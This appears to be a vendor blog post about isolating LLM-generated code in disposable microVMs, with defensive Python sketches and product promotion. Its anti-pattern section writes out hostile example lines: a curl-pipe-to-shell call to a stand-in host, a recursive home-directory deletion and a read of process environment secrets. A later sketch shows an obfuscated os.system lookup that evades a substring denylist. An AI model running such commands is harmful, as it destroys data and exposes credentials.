How to Jail LLM-Generated Code

Ajay Kumar · June 27, 2026 · 9 min read

If you let a language model write code and then run that code, you have signed up to execute software authored by a system that cannot be held accountable, did not read its own output for safety, and was possibly steered by text it read on the internet thirty seconds ago. This is not a knock on the models — they are extraordinary. It's a statement about probability. Run enough model-generated code and the distribution will eventually hand you `rm -rf /`, an infinite loop, a fork bomb, an outbound request to an address you've never heard of, or a payload that a prompt injection talked the model into emitting. The model is not malicious. It's just confidently wrong at root, on a long enough timeline. So the correct posture is not "trust but verify" — it's to treat every byte of model output as hostile and run it somewhere you can afford to lose. This post is the how-to: the defense layers, why each one exists, and the exact code to jail LLM-generated code in production.

The mental model that makes the rest of this easy: you are not trying to make the code safe. You cannot — you didn't write it and can't review it in time. You are trying to make it not matter that the code is dangerous. Every layer below moves blast radius away from things you care about and toward a throwaway box you were going to delete anyway.

Why you treat all model output as hostile

"Hostile" here is not an accusation, it's a threat-model default. You assume the worst because three properties of LLM code generation make the worst genuinely likely over time, and none of them are fixable by being a better prompter.

No accountable author — there is no human who understood the command, intended its effects, and can be asked why. A code review assumes an author who can defend the diff. Model output has no such author; the "author" is a sampling process.
Adversarial inputs (prompt injection) — the model often acts on text it just read: a web page, a file, a tool result, an email. Any of that can carry instructions, so a command the model emits may have been authored by an attacker who poisoned the input, not by the model's own reasoning.
Confidently wrong — the most common failure is not evil, it's a hallucinated path, a destructive flag the model thought was harmless, or a 2014 Stack Overflow `curl | sh` it pattern-matched to. It will state, with total fluency, that wiping the directory is the fix. Fluency is not correctness.

The unattended loop multiplies all three. An agent runs the next command based on the last one's output with no human in the loop to flinch at `rm -rf /`. By the time a person looks, the command has run. So you design for the run that goes wrong, because at scale it will, and you make that run boring.

Layer 0: do not eval() in your own process

The fastest way to get owned is to feed model output to `eval()`, `exec()`, or `subprocess` in the same process that holds your secrets, your database connection, and your network. The code inherits everything your process can do — your API keys are in its environment, your DB is one connection string away, and your cloud metadata endpoint is a single HTTP request away. There is no boundary here at all. This is the one pattern with zero acceptable uses for untrusted input.

# ============================================================
# DO NOT DO THIS. This is the vulnerability, not the example.
# ============================================================
import subprocess

# Whatever the model decided to run this turn.
model_output = get_code_from_llm(user_request)

# eval / exec in your own interpreter: the code now has your
# process's memory, your imported secrets, your everything.
eval(model_output)                      # <- owns your process

# subprocess on the host is no better: same env vars, same
# filesystem, same network, same cloud credentials.
subprocess.run(model_output, shell=True)  # <- owns your host

# The model only has to emit one of these once:
#   __import__('os').system('curl evil.sh | sh')   # via eval/exec
#   rm -rf ~                                        # via the shell
#   print(open('/proc/self/environ').read())        # your secrets
# ...and there is no boundary to stop it. There never was one.
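
To make the "same env vars" point concrete, here is a minimal sketch using only the standard library. `DEMO_API_KEY` and its value are made up for illustration, and the child code is a harmless stand-in we wrote ourselves, not model output.

```python
import os
import subprocess
import sys

# A fake secret standing in for a real API key in the parent's environment.
os.environ["DEMO_API_KEY"] = "sk-not-a-real-key"

# Harmless stand-in for model output: it only reports what it can see.
child_code = "import os; print(os.environ.get('DEMO_API_KEY', 'NOT VISIBLE'))"

# Default behaviour: the child inherits the parent's whole environment.
inherited = subprocess.run(
    [sys.executable, "-c", child_code],
    capture_output=True, text=True, check=True,
).stdout.strip()

# Dropping the variable hides this one secret, and only this one.
env_without_key = {k: v for k, v in os.environ.items() if k != "DEMO_API_KEY"}
scrubbed = subprocess.run(
    [sys.executable, "-c", child_code],
    env=env_without_key,
    capture_output=True, text=True, check=True,
).stdout.strip()

print("inherited env:", inherited)
print("scrubbed env: ", scrubbed)
```

Scrubbing the environment is shown only for contrast. The child still shares the host's filesystem, network, and kernel, so this demonstrates the problem rather than fixing it.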

If you remember one thing: model output and your process must never share an address space, an environment, or a credential set. "I sanitize the string first" does not save you — you cannot reliably parse what arbitrary code will do without running it, and once you've run it, it's too late.
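
A small sketch of why string sanitization is not a boundary. The denylist and both payload strings are hypothetical, and the only thing evaluated is a fixed literal that looks up a function without calling it.

```python
import os

# A hypothetical denylist of "dangerous" substrings.
DENYLIST = ("os.system", "subprocess", "rm -rf", "curl")


def looks_safe(code: str) -> bool:
    """Naive filter: reject code that contains any denylisted substring."""
    return not any(token in code for token in DENYLIST)


# The obvious payload is caught by the filter.
obvious = "import os; os.system('rm -rf ~')"

# The same capability, spelled so that no denylisted substring appears.
# This expression only looks up os.system; it never calls it.
obfuscated = "getattr(__import__('o' + 's'), 'sys' + 'tem')"

print("obvious passes filter:   ", looks_safe(obvious))
print("obfuscated passes filter:", looks_safe(obfuscated))

# Evaluating a fixed literal we wrote ourselves, purely to show what the
# filter let through. Never do this with model output.
resolved = eval(obfuscated)
print("resolves to os.system:   ", resolved is os.system)
```

Every spelling you add to the denylist has another one behind it, which is why the boundary has to be where the code runs and not what the code looks like.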

Layer 0.5: a bare container is not the jail either

The next instinct is a Docker container, and it's a real improvement over running on the host — but a plain container is not sufficient as the sole boundary for arbitrary model-generated code. Every container on a host shares one Linux kernel, and the namespaces, cgroups, capabilities, and seccomp filters that isolate it are all features of that same shared kernel. So the kernel is simultaneously running the untrusted code and being protected from it. A kernel bug reachable via a syscall, a container-runtime bug, or — most common in practice — a misconfiguration (a `--privileged` flag, a mounted `docker.sock`, a host bind mount) reaches the host and, on a multi-tenant box, every neighbor. Containers are the right tool for your own trusted code. They are not a hardware boundary against code you'd describe as hostile. The fuller argument lives in /blog/why-docker-is-not-a-sandbox.
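
The misconfigurations named above can at least be linted for. A rough sketch, assuming you launch containers from an argv list: `audit_docker_run` is a hypothetical helper, it recognizes only the `--privileged`, `-v`/`--volume`, and `--mount` spellings shown, and a clean result says nothing about kernel or runtime bugs.

```python
def audit_docker_run(argv: list[str]) -> list[str]:
    """Return findings for the three misconfigurations named in the text."""
    findings = []
    for i, arg in enumerate(argv):
        if arg in ("--privileged", "--privileged=true"):
            findings.append("--privileged: container gets near-host capabilities")
            continue

        # Volume flags come as "-v SPEC", "--volume SPEC", "--mount SPEC",
        # or the "--volume=SPEC" / "--mount=SPEC" forms.
        following = argv[i + 1] if i + 1 < len(argv) else ""
        if arg in ("-v", "--volume", "--mount"):
            spec = following
        elif arg.startswith(("--volume=", "--mount=")):
            spec = arg.split("=", 1)[1]
        else:
            continue

        if "docker.sock" in spec:
            findings.append(f"docker.sock mounted: {spec}")
        elif spec.startswith("/") or "type=bind" in spec:
            findings.append(f"host bind mount: {spec}")
    return findings


risky = [
    "docker", "run", "--privileged",
    "-v", "/var/run/docker.sock:/var/run/docker.sock",
    "-v", "/srv/data:/data",
    "python:3.12", "python", "task.py",
]
safe = ["docker", "run", "--rm", "-v", "scratch:/work", "python:3.12"]

for finding in audit_docker_run(risky):
    print("FINDING:", finding)
print("safe findings:", audit_docker_run(safe))
```

A lint like this catches the most common self-inflicted escapes. It does not change the fact that the container still shares the host kernel.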

The jail: a fresh microVM per task, then six bars on the window

The boundary that actually holds is a microVM: each task gets its own guest kernel inside CPU hardware virtualization (KVM), so an escape has to break the much smaller hypervisor boundary instead of one reachable syscall in a shared kernel. Firecracker, the VMM AWS built for Lambda and Fargate, is the sharpest version, with a minimal device model and a boot time on the order of 125 ms rather than the seconds a conventional VM takes. But the microVM is only the cell. A jail is the cell plus the rules. Six bars, in order of how often they actually save you:

1. Hardware kernel isolation: run the code in a microVM with its own guest kernel, not a shared-kernel container. This is the wall that contains an escape, and every other layer assumes it is holding.
2. A TTL / wall-clock kill: set a time-to-live on the sandbox so an infinite loop, a hung download, or an injected `sleep infinity` gets reaped automatically even if your code forgets. Loops loop; sometimes they don't stop.
3. CPU and memory caps: bound the VM so a fork bomb or a crypto-miner the model was tricked into running starves itself inside its own cell instead of starving the host fleet. The baked VM size is the ceiling the guest cannot exceed.
4. Controlled network egress: default-deny outbound, allowlist only what the task needs. This is what stops `curl | sh` from fetching a payload and stops a quiet POST of whatever the code found from ever leaving.
5. No persistent secrets in the guest: never inject cloud keys, DB passwords, or long-lived tokens. Pass only a narrowly-scoped, short-lived credential if the task truly needs one. You cannot exfiltrate a secret that was never in the room.
6. Destroy-after: the sandbox is not scrubbed or reset between tasks, it is destroyed, and the next task gets a clean one restored from a known-good snapshot. A poisoned run cannot plant something for the next run because there is no next run in that VM.

Bars 1 and 6 — hardware isolation plus destroy-after — are the load-bearing pair. Isolation answers "can this reach the host?"; ephemerality answers "can this run affect the next one?" Bars 2 through 5 decide how bad a single contained run can be before it's torn down. You want all six; the comparison below is why the cell has to be a microVM and not the cheaper options.
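
The wall-clock kill reduces to one mechanic: something outside the code decides when time is up. Here is a local sketch of that mechanic using the `timeout` argument of Python's `subprocess.run`, with a harmless infinite loop we wrote ourselves as the runaway task. `run_with_deadline` is a hypothetical name, and in a real jail the deadline is enforced by the platform from outside the guest, not by a child process on your host.

```python
import subprocess
import sys

# Harmless stand-in for a runaway task: a loop that never exits.
runaway = "while True: pass"


def run_with_deadline(code: str, seconds: float) -> str:
    """Run code in a child interpreter and kill it once the deadline passes."""
    try:
        done = subprocess.run(
            [sys.executable, "-c", code],
            capture_output=True, text=True, timeout=seconds,
        )
        return f"exited:{done.returncode}"
    except subprocess.TimeoutExpired:
        # subprocess.run kills the child and waits for it before re-raising,
        # so no orphaned loop is left behind.
        return "killed:deadline"


print(run_with_deadline(runaway, 1.0))
print(run_with_deadline("print('ok')", 10.0))
```

The point of the sketch is who holds the clock. The code being run never gets a vote on whether it has had long enough.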

eval-in-process vs container vs microVM

eval() / subprocess in your process — no boundary at all. The code gets your memory, your secrets, your network, your credentials. Acceptable only for code you wrote and fully trust; never for model output.
Bare container (Docker, runc) — a real isolation mechanism but a shared-kernel boundary: the whole host syscall ABI is the attack surface, and a kernel bug, runtime bug, or misconfig reaches the host and every neighbor. Right for your own trusted code; not sufficient alone for arbitrary, hostile, multi-tenant model output.
microVM (Firecracker) — each task gets its own guest kernel inside hardware virtualization, so the host is exposed only to a small, audited surface (the VMM, the KVM ioctl interface, a minimal virtio device model). An escape must break the hypervisor, not one syscall. This is the right default for jailing LLM-generated code — and with snapshot-restore it's cheap enough to do per task.

Stronger is not absolute, and a security reader should hold us to that. KVM has had real guest-to-host escape CVEs (Google pays up to $250,000 for one via kvmCTF), and microarchitectural side channels cross the VM boundary in principle. The honest claim is that a microVM is a meaningfully smaller, hardware-enforced, more-audited boundary than a shared kernel — not an unbreakable one. You still want every other bar on the window.

The good example: jailing it with PandaStack

Here is the same task as the BAD example above, done correctly. The model's code runs inside a fresh, hardware-isolated microVM with a TTL, the VM holds nothing worth stealing, and it is destroyed the moment the task ends. We never inspect the code for safety — we don't have to, because of where it runs. The historical objection to a VM-per-task pattern was boot cost; PandaStack removes it by restoring a baked Firecracker snapshot on demand, with a p50 of about 179ms (p99 ~203ms) to a live, isolated microVM and no warm pool of idle VMs. The first spawn of a brand-new template cold-boots in roughly 3 seconds and then bakes a snapshot, so every create after that takes the fast path. At ~179ms a clean jail per task is the default, not a luxury.

from pandastack import Sandbox

# Whatever the model wrote this turn. Assume it's hostile: it may be
# the product of a prompt injection in the file we asked it to summarize.
model_code = get_code_from_llm(user_request)

# One hardware-isolated microVM, just for this task (~179ms p50 to create).
# ttl_seconds is the wall-clock kill: even an infinite loop or a hung
# download gets reaped automatically if we never tear it down ourselves.
with Sandbox.create(
    template="code-interpreter",
    ttl_seconds=60,            # bar #2: TTL / wall-clock kill
) as sbx:
    # Write the model's code into the guest filesystem, not into our process.
    sbx.filesystem.write("/work/task.py", model_code)

    # Run it with a per-command timeout so a tight loop hits a wall,
    # not our bill. CPU/mem caps (bar #3) come from the baked VM size;
    # egress is default-deny + allowlist (bar #4); no host secrets are
    # in this guest (bar #5).
    result = sbx.exec(
        "python3 /work/task.py",
        timeout_seconds=30,
    )
    print("exit:", result.exit_code)   # 0 == success; your primary signal
    print(result.stdout)
    print(result.stderr[:500])
# bar #1 held the whole time; bar #6 fires HERE: the context manager
# destroys the VM. The model can rm -rf /, fork-bomb, or curl | sh inside
# it — the worst case is a deleted throwaway box. Nothing survives to the
# next task: no files, no processes, no cached secret.
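
Destroy-after leans on an ordinary Python guarantee: a `with` block runs its exit handler even when the body raises. A sketch with a hypothetical `FakeSandbox` stand-in (not the PandaStack SDK), assuming the real context manager tears the VM down on exit as the comments above describe.

```python
class FakeSandbox:
    """Hypothetical stand-in for a sandbox handle. NOT the PandaStack SDK."""

    def __init__(self) -> None:
        self.destroyed = False

    def __enter__(self) -> "FakeSandbox":
        return self

    def __exit__(self, exc_type, exc, tb) -> bool:
        # Teardown runs on every exit path: normal return or exception.
        self.destroyed = True
        return False  # do not swallow the exception

    def exec(self, command: str) -> None:
        # Simulate the task going badly wrong mid-run.
        raise RuntimeError(f"guest command failed: {command}")


sbx = FakeSandbox()
try:
    with sbx:
        sbx.exec("python3 /work/task.py")
except RuntimeError as err:
    print("task failed:", err)

print("destroyed:", sbx.destroyed)
```

Because teardown is tied to leaving the block rather than to a cleanup call you have to remember, a crash in your own orchestration code still ends with the sandbox gone. The TTL covers the remaining case where your process dies before the block exits.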

The SDK reads `PANDASTACK_API_KEY` (keys are prefixed `pds_`) from the environment, with a configurable base URL; the same flow exists in the TypeScript SDK (`@pandastack/sdk`) and the `pandastack` CLI. PandaStack's core is Apache-2.0 and self-hostable on your own Linux KVM hosts (`/dev/kvm`): you run the control-plane API and a per-host agent, and the sandboxes execute on your infrastructure. If you need working state to carry across steps within one task — packages installed, a repo cloned — fork the configured sandbox rather than reusing one across trust boundaries; a same-host fork lands in roughly 400–750ms via copy-on-write (guest memory MAP_PRIVATE, rootfs reflink), a cross-host fork in 1.2–3.5s. See /blog/snapshot-and-fork-explained.

The jailing checklist

Run this list before you ship anything that executes model output. If you can't tick all of it, you're relying on the model never being wrong, which is the one thing it cannot promise you.

Model output never touches eval(), exec(), or subprocess in a process that holds secrets, a DB connection, or your network. Ever.
The code runs in a hardware-isolated microVM (its own guest kernel via KVM), not a bare shared-kernel container, and not on the host.
Every sandbox has a TTL so a runaway loop or hung command is reaped automatically without human intervention.
CPU and memory are capped so a fork bomb or miner starves its own VM, not the fleet, and each exec has a per-command timeout.
Network egress is default-deny with an allowlist for only what the task needs; the cloud metadata endpoint (169.254.169.254) is unreachable from inside.
No host credentials, cloud keys, or long-lived tokens are injected into the guest — only a narrowly-scoped, short-lived credential if the task genuinely requires one.
Results (exit code, stdout, stderr) are captured over the platform API, not by mounting host paths back into the guest.
The sandbox is destroyed after the task — one environment per task, always thrown away, never reused across tasks or tenants.
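
The checklist can also live in code as a pre-flight check. A sketch, assuming your launcher builds some policy object before creating a sandbox. `JailPolicy`, its field names, and its defaults are hypothetical and map to the items above rather than to any real SDK.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple

METADATA_IP = "169.254.169.254"


@dataclass(frozen=True)
class JailPolicy:
    """Hypothetical description of how one task will be run."""
    isolation: str = "microvm"
    ttl_seconds: Optional[int] = 60
    exec_timeout_seconds: Optional[int] = 30
    vcpus: Optional[int] = 1
    memory_mb: Optional[int] = 512
    egress_default_deny: bool = True
    egress_allowlist: Tuple[str, ...] = ()
    injected_secrets: Tuple[str, ...] = ()
    host_mounts: Tuple[str, ...] = ()
    destroy_after_task: bool = True


def unmet_checks(p: JailPolicy) -> List[str]:
    """Return the checklist items this policy fails; empty means all ticked."""
    problems = []
    if p.isolation != "microvm":
        problems.append("code must run in a hardware-isolated microVM")
    if not p.ttl_seconds or p.ttl_seconds <= 0:
        problems.append("sandbox needs a TTL")
    if not p.vcpus or not p.memory_mb:
        problems.append("CPU and memory must be capped")
    if not p.exec_timeout_seconds or p.exec_timeout_seconds <= 0:
        problems.append("each exec needs a per-command timeout")
    if not p.egress_default_deny:
        problems.append("network egress must be default-deny")
    if METADATA_IP in p.egress_allowlist:
        problems.append("cloud metadata endpoint must be unreachable")
    if p.injected_secrets:
        problems.append("no host credentials or long-lived tokens in the guest")
    if p.host_mounts:
        problems.append("capture results over the API, not host mounts")
    if not p.destroy_after_task:
        problems.append("sandbox must be destroyed after the task")
    return problems


bad = JailPolicy(
    isolation="container",
    ttl_seconds=None,
    injected_secrets=("AWS_SECRET_ACCESS_KEY",),
    destroy_after_task=False,
)
print("default policy:", unmet_checks(JailPolicy()))
for problem in unmet_checks(bad):
    print("UNMET:", problem)
```

Failing closed is the useful design choice here: refuse to launch when the list is non-empty, rather than logging a warning and running anyway.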

The payoff: a deleted VM instead of an incident

Put all six bars on the window and the worst day for a system that runs LLM-generated code stops being an incident review and a credential rotation. It becomes a confused log line — `exit: 1, stderr: rm: cannot remove '/': Permission denied` — and a sandbox that was already scheduled for deletion. The model will keep getting better, and it will keep, occasionally, being confidently wrong at root. Your job is not to outguess it. Your job is to make sure the one time it runs something terrible, the only casualty is a throwaway VM. For the agent-loop version of this pattern — the shell-command case, allowlists, and prompt injection — see /blog/sandbox-ai-agent-shell-commands; for the threat-model-first decision framework across every isolation option, see /blog/how-to-sandbox-untrusted-code.

Frequently asked questions

How do I safely run code that an LLM generated?

Never feed it to eval(), exec(), or subprocess in your own process — that gives the code your secrets, network, and credentials. Instead run it inside a fresh hardware-isolated microVM created just for that task, with a TTL (wall-clock kill), CPU and memory caps, default-deny network egress, no host credentials in the guest, and destruction of the VM when the task ends. You don't inspect the code for safety; you make the environment expendable so a bad command can only wreck a throwaway box. Sub-second microVM creation (PandaStack's is ~179ms p50) makes a disposable VM per task practical rather than a luxury.

Why should I treat all LLM output as hostile when the model isn't malicious?

Because the threat doesn't require malice. The model has no accountable author who understood the command, it often acts on inputs that may be attacker-controlled (prompt injection from a web page, file, or tool result), and its most common failure is being confidently wrong — a hallucinated path or a destructive flag it believed was harmless. Run enough model code unattended and the distribution will eventually produce rm -rf /, an infinite loop, a fork bomb, or an exfil request. "Treat all output as hostile" is just designing for the run that goes wrong, because at scale it will.

Isn't a Docker container enough to jail LLM-generated code?

Not on its own for arbitrary, possibly-hostile, multi-tenant model output. Every container shares the host's Linux kernel, and the namespaces, cgroups, capabilities, and seccomp filters that isolate it are enforced by that same kernel — so a kernel bug reachable via a syscall, a runtime bug, or a misconfiguration (privileged container, mounted docker.sock, host mounts) can reach the host and every neighbor. Containers are the right tool for your own trusted code. For code you'd call hostile, use a microVM with its own guest kernel, which contains an escape at the hardware-virtualization boundary instead of the shared syscall surface.

How do I stop LLM-generated code from making outbound network requests or stealing secrets?

Two layers. First, default-deny network egress with an allowlist for only what the task needs, so the code can't curl a payload in or POST data out, and make the cloud metadata endpoint (169.254.169.254) unreachable from inside the sandbox. Second, put no secrets worth stealing in the guest — never inject cloud keys, database passwords, or long-lived tokens; pass only a narrowly-scoped, short-lived credential if the task truly requires one. You cannot exfiltrate a secret that was never in the room, and you cannot reach a host you were never allowed to talk to.
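
The first layer is a default-deny decision. A sketch of that decision in Python: the allowlisted hosts are illustrative, `egress_allowed` is a hypothetical name, and real enforcement belongs in a firewall or proxy outside the guest that also checks what a hostname resolves to.

```python
import ipaddress

# Illustrative allowlist of (host, port) pairs a task might need.
ALLOWLIST = frozenset({("pypi.org", 443), ("files.pythonhosted.org", 443)})


def egress_allowed(host: str, port: int, allowlist=ALLOWLIST) -> bool:
    """Default-deny: permit only exact (host, port) matches on the allowlist."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None  # not an IP literal, treat as a hostname

    # Never allow link-local (which includes 169.254.169.254), loopback,
    # or private ranges, even if someone adds them to the allowlist.
    if ip is not None and (ip.is_link_local or ip.is_loopback or ip.is_private):
        return False

    return (host.lower(), port) in allowlist


for target in [("pypi.org", 443), ("pypi.org", 80),
               ("evil.example", 443), ("169.254.169.254", 80)]:
    print(target, "->", "allow" if egress_allowed(*target) else "deny")
```

Checking the address class before the allowlist means a careless allowlist entry cannot reopen the metadata endpoint.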

Doesn't creating a fresh microVM for every task add too much latency?

Not anymore. PandaStack restores a baked Firecracker snapshot on demand with a p50 of about 179ms (p99 ~203ms) to a live, isolated microVM, and there's no warm pool of idle VMs. The first spawn of a brand-new template cold-boots in roughly 3 seconds and bakes a snapshot, so every create after that takes the fast path. If you need each task to start from a known-good post-setup state, fork a configured sandbox instead — a same-host fork lands in roughly 400–750ms via copy-on-write. At that cost, a disposable jail per task is a sensible default rather than an expensive optimization.

Written by Ajay Kumar, Founder, PandaStack.